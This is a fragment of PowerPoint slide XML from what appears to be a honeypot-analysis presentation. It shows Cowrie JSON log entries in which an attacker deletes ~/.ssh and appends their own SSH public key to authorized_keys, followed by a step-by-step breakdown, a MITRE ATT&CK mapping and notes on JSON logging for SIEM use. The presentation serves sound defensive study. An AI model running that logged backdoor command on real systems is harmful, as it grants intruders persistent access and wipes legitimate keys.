              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>😐</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="587335" y="1796415"/>
            <a:ext cx="13455729" cy="1907858"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8576"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="101010"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581978" y="1796415"/>
            <a:ext cx="13466445" cy="1907858"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 858"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="101010"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691039" y="1878211"/>
            <a:ext cx="13248323" cy="1744266"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1350"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="101010"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"ip-172-31-21-182.ec2.internal","timestamp":"2025-10-26T01:44:08.230264Z","src_ip":"173.249.50.59","session":"e1652bcaace2"}{"eventid":"cowrie.command.input","input":"cd ~ &amp;&amp; rm -rf .ssh &amp;&amp; mkdir .ssh &amp;&amp; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\"&gt;&gt;.ssh/authorized_keys &amp;&amp; chmod -R go= ~/.ssh &amp;&amp; cd ~","message":"CMD: cd ~ &amp;&amp; rm -rf .ssh &amp;&amp; mkdir .ssh &amp;&amp; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\"&gt;&gt;.ssh/authorized_keys &amp;&amp; chmod -R go= ~/.ssh &amp;&amp; cd ~","sensor":"ip-172-31-21-182.ec2.internal","timestamp":"2025-10-26T01:44:08.562311Z","src_ip":"173.249.50.59","session":"e1652bcaace2"}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="587335" y="3867864"/>
            <a:ext cx="2181463" cy="272653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Attack Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="587335" y="4304109"/>
            <a:ext cx="245388" cy="245388"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 66677"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="222222"/>
          </a:solidFill>
          <a:ln w="7620">
            <a:solidFill>
              <a:srgbClr val="3B3B3B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="10160" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628174" y="4324529"/>
            <a:ext cx="163592" cy="204430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1250"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941784" y="4339471"/>
            <a:ext cx="6305193"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Removes file attributes to make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="101010"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>.ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> directory modifiable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7383304" y="4304109"/>
            <a:ext cx="245388" cy="245388"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 66677"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="222222"/>
          </a:solidFill>
          <a:ln w="7620">
            <a:solidFill>
              <a:srgbClr val="3B3B3B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="10160" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7424142" y="4324529"/>
            <a:ext cx="163592" cy="204430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1250"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7737753" y="4339471"/>
            <a:ext cx="6305312"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Deletes existing SSH directory and creates new one</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="587335" y="4767620"/>
            <a:ext cx="245388" cy="245388"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 66677"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="222222"/>
          </a:solidFill>
          <a:ln w="7620">
            <a:solidFill>
              <a:srgbClr val="3B3B3B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="10160" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628174" y="4788039"/>
            <a:ext cx="163592" cy="204430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1250"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941784" y="4802981"/>
            <a:ext cx="6305193"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Installs their SSH public key for persistent backdoor access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7383304" y="4767620"/>
            <a:ext cx="245388" cy="245388"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 66677"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="222222"/>
          </a:solidFill>
          <a:ln w="7620">
            <a:solidFill>
              <a:srgbClr val="3B3B3B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="10160" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7424142" y="4788039"/>
            <a:ext cx="163592" cy="204430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1250"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7737753" y="4802981"/>
            <a:ext cx="6305312"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Sets proper permissions to avoid detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="587335" y="5135642"/>
            <a:ext cx="1345572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MITRE ATT&amp;CK classification: T1098.004 (Account Manipulation - SSH Authorized Keys)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="587335" y="5473660"/>
            <a:ext cx="3082647" cy="272653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Why JSON Format is Valuable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2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335" y="5909905"/>
            <a:ext cx="272653" cy="272653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="587335" y="6318885"/>
            <a:ext cx="1363385" cy="170378"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1300"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Structured Data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="587335" y="6554629"/>
            <a:ext cx="439435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Structured data for automated analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2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021" y="5909905"/>
            <a:ext cx="272653" cy="272653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5118021" y="6318885"/>
            <a:ext cx="1363385" cy="170378"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1300"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Easy Parsing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5118021" y="6554629"/>
            <a:ext cx="439435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Easy parsing with tools like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="101010"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>jq</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2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8706" y="5909905"/>
            <a:ext cx="272653" cy="272653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9648706" y="6318885"/>
            <a:ext cx="1363385" cy="170378"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1300"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Standardized Fields</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9648706" y="6554629"/>
            <a:ext cx="439435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Standardized fields across all events</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3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7335" y="6947178"/>
            <a:ext cx="272653" cy="272653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="587335" y="7356158"/>
            <a:ext cx="1363385" cy="170378"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1300"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SIEM Integration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="587335" y="7591901"/>
            <a:ext cx="439435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Perfect for feeding into SIEM systems</a:t>
            </a:r>
